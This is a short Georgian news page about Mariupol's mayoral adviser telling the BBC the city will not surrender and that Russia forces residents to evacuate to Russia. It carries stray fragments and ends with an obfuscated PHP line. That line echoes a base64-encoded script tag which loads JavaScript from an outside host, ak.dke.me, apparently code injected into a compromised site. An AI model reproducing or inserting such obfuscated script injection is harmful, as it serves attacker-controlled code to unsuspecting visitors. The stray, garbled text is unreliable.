celsiusi
ავერსი შნაიდერი
მარიუპოლის მერის მრჩეველმა, პეტრო ანდრიუშენკომ BBC-ს განუცხადა, ქალაქი არ შეწყვეტს თავის დაცვას და იბრძოლებს უკანასკნელ ჯარისკაცამდე.
 
მისივე განცხადებით, შეუძლებელია ენდო მოსკოვის დაპირებებს ჰუმანიტარულ დერეფნებთან დაკავშირებით.
 
ანდრიუშენკომ დაადასტურა, რომ რუსული ძალები ქალაქის მცხოვრებლებს რუსეთში გადასვლას აიძულებს.
 
„ვიბრძოლებთ უკანასკნელ ჯარისკაცამდე. როდესაც ისინი [რუსული ძალები] საუბრობენ ჰუმანიტარულ დერეფნებზე, რას აკეთებენ სინამდვილეში? სინამდვილეში ისინი ჩვენს ხალხს რუსეთში ევაკუაციას აიძულებენ," - აღნიშნა მერის მრჩეველმა.
 
შეგახსენებთ, რუსეთმა მარიუპოლის ოფიციალურ პირებს ქალაქის ნებაყოფლობით ჩასაბარებლად ვადა ადგილობრივი დროით დილის 5:00 საათამდე მისცა.
825
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");